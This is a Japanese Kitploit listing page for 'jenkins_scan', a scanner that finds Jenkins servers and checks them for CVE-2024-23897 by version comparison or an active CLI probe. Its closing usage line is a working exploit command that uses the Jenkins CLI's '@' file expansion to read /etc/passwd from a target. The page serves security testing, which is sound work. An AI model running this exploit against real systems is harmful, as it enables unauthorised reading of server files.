Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
jenkins_scan — Jenkins環境を検出し、CVE-2024-23897をチェックします | Kitploit
ツール/GitHubGitHub/w41l3r/jenkins_scan
偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubw41l3r/jenkins_scan

jenkins_scan

Jenkins環境を検出し、CVE-2024-23897をチェックします

リポジトリを見る
4ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

jenkins_scan

Jenkins環境を発見し、CVE-2024-23897をチェックします

動作の仕組み

Jenkinsの検出

パスをテスト: /、/login、/oops、/api/json、/cli、/jenkins/、/jenkins/api/json

以下の方法で識別:

  1. X-Jenkins ヘッダー — 最も信頼性が高く、バージョンも返します
  2. X-Hudson ヘッダー — より古いインスタンス
  3. HTML本文 — "login to jenkins"、"hudson.model" などの文字列
  4. /api/json — JSON構造(_class、jobs、views)で確認

CVE-2024-23897の検証

パッシブ(デフォルト): 検出されたバージョンをしきい値と比較:

  • Weekly: < 2.442 → 脆弱
  • LTS: < 2.426.3 → 脆弱

アクティブ(--active): Jenkins CLIのバイナリプロトコルのハンドシェイクをHTTPで送信します。サーバーが200 + Content-Type: application/octet-streamで応答した場合、CLIチャネルが開いており、エクスプロイトが適用可能であることを確認します。

使用方法

基本スキャン

python jenkins_scan.py -f urls.txt

アクティブプローブ + Burpをプロキシとして使用 + ファイル出力

python jenkins_scan.py -f urls.txt --active --proxy http://127.0.0.1:8080 -o resultados.txt

20スレッド、verbose、色なし(パイプ/grep用)

python jenkins_scan.py -f urls.txt -t 20 -v --no-color

脆弱なターゲットに対して手動でエクスプロイトを確認

java -jar jenkins-cli.jar -s http://TARGET/ who-am-i "@/etc/passwd"

ツールをダウンロード